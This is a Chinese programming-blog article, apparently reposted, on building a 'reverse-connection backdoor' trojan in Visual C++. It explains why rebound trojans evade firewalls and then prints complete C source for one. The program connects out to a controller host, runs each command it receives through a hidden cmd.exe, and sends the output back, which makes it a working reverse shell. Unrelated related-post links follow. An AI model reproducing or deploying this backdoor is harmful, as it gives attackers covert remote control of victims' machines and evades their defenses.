基于visual c++之windows核心编程代码分析(41)实现反向连接后门
来源:互联网 发布:中国留学生在美国 知乎 编辑:程序博客网 时间:2024/05/22 01:54
随着安全事件的不断涌现,人们的主机防护意识越来越强,各种各样的防火墙和反病毒软件都开始对来自外部的网络连接进行监控,所以传统的采用正向连接的木马已经不再适应现在的网络环境了。为了能够继续进行远程控制,木马不得不从体制上进行改变,这就出现了采用反向连接技术的。“反弹型”木马。“反弹”木马现在已经见得比较多了,但是对其技术细节介绍的文章还是比较少。为了监控危害我们伟大祖国的间谍分子,我们需要实现反向链接的后门
从本质上来说,反向连接和正向连接的区别并不大。在正向连接的情况下,服务器端也就是被控制端,在编程实现的时候是采用服务器端的编程方法的;而控制端,在编程实现的时候采用的是客户端的编程方法。当我们采用反弹的方法编程的时候,实际上就是将被控制端变成了采用客户端的编程方法,而将控制端变成了采用服务器端的编程方法(Socket:不知道这样解释读者朋友们能不能听明白?反正俺是觉得云里雾里)。还是通过简单的编程实例来解释一下吧,免得有人。虽然下面我给出的例子比较小,但是却很有代表性,读者可以从中体会到反向连接技术的实现方法。同时,对于不熟悉网络编程的读者,也是一次促进学习的机会,可以通过这个例子来熟悉一下网络编程。
以反向连接为例,我们先来看看控制端的编程实现方法。
#include<winsock2.h>#include<stdio.h>#pragma comment(lib,"ws2_32.lib")void main(int argc,char **argv){char *messages = "\r\n======================== BackConnect BackDoor V0.1 ========================\r\n========= Welcome to Http://www.hackerxfiles.net =========\r\n"; WSADATA WSAData;SOCKET sock;SOCKADDR_IN addr_in;char buf1[1024]; //作为socket接收数据的缓冲区memset(buf1,0,1024); //清空缓冲区 if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0) { printf("WSAStartup error.Error:d\n",WSAGetLastError()); return; } addr_in.sin_family=AF_INET; addr_in.sin_port=htons(80); //反向连接的远端主机端口 addr_in.sin_addr.S_un.S_addr=inet_addr("127.0.0.1"); //远端IP if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET) { printf("Socket failed.Error:d\n",WSAGetLastError()); return; } if(WSAConnect(sock,(struct sockaddr *)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL)==SOCKET_ERROR) //连接客户主机 { printf("Connect failed.Error:d",WSAGetLastError()); return; } if (send(sock,messages,strlen(messages),0)==SOCKET_ERROR) //发送欢迎信息 { printf("Send failed.Error:d\n",WSAGetLastError()); return; } char buffer[2048] = {0};//管道输出的数据for(char cmdline[270];;memset(cmdline,0,sizeof(cmdline))){SECURITY_ATTRIBUTES sa;//创建匿名管道用于取得cmd的命令输出HANDLE hRead,hWrite;sa.nLength = sizeof(SECURITY_ATTRIBUTES);sa.lpSecurityDescriptor = NULL;sa.bInheritHandle = TRUE;if (!CreatePipe(&hRead,&hWrite,&sa,0)) { printf("Error On CreatePipe()"); return;} STARTUPINFO si;PROCESS_INFORMATION pi; si.cb = sizeof(STARTUPINFO);GetStartupInfo(&si); si.hStdError = hWrite;si.hStdOutput = hWrite;si.wShowWindow = SW_HIDE;si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;GetSystemDirectory(cmdline,MAX_PATH+1);strcat(cmdline,"\\cmd.exe /c");int len=recv(sock,buf1,1024,NULL);if(len==SOCKET_ERROR)exit(0); //如果客户端断开连接,则自动退出程序if(len<=1){send(sock,"error\n",sizeof("error\n"),0);continue;}strncat(cmdline,buf1,strlen(buf1)); //把命令参数复制到cmdlineif (!CreateProcess(NULL,cmdline,NULL,NULL,TRUE,NULL,NULL,NULL,&si,&pi)) { send(sock,"Error command\n",sizeof("Error command\n"),0); continue;} CloseHandle(hWrite);//循环读取管道中数据并发送,直到管道中没有数据为止for(DWORD bytesRead;ReadFile(hRead,buffer,2048,&bytesRead,NULL);memset(buffer,0,2048)){ send(sock,buffer,strlen(buffer),0);} }}
- 基于visual c++之windows核心编程代码分析(41)实现反向连接后门
- 基于Visual C++之Windows核心编程代码分析(2)实现Windows用户管理
- 基于Visual C++之Windows核心编程代码分析(2)实现Windows用户管理
- 基于Visual C++之Windows核心编程代码分析(2)实现Windows用户管理
- 基于visual c++之windows核心编程代码分析(48)编程实现远程登录3389
- 基于visual c++之windows核心编程代码分析(59)实现网络简单代理编程
- 基于visual c++之windows核心编程代码分析(48)编程实现远程登录3389
- 基于Visual C++之Windows核心编程代码分析(1)实现设备管理器枚举设备
- 基于Visual C++之Windows核心编程代码分析(3)实现程序自动安装
- 基于visual c++之windows核心编程代码分析(10)实现socket通信
- 基于visual c++之windows核心编程代码分析(11)实现屏幕截取
- 基于visual c++之windows核心编程代码分析(26)实现文件关联
- 基于visual c++之windows核心编程代码分析(28)实现开机自启动
- 基于visual c++之windows核心编程代码分析(29)ICMP实现远程控制
- 基于visual c++之windows核心编程代码分析(33)实现防火墙模型
- 基于visual c++之windows核心编程代码分析(40)实现屏幕截取
- 基于visual c++之windows核心编程代码分析(40)实现屏幕截取
- 基于visual c++之windows核心编程代码分析(54)实现Winlogon注入dll
- 智能定投的最优前提:始于熊市终于牛市
- 2011,那些值得的回忆
- 基于visual c++之windows核心编程代码分析(40)实现屏幕截取
- Windows程序设计__孙鑫C++Lesson2《掌握C++》 .
- Android模拟器学framework和driver之传感器篇1(linux sensor driver)
- 基于visual c++之windows核心编程代码分析(41)实现反向连接后门
- GDB基本命令(整合)
- qt的拖放
- POJ1664 放苹果 递归
- 银行女理财专员的定投心得
- 新年快乐!
- 弱市加大基金定投 安享“微笑曲线”
- 只停利不停损 定投要傻傻地买聪明地卖(图)
- 绕开三大误区 正确认识基金定投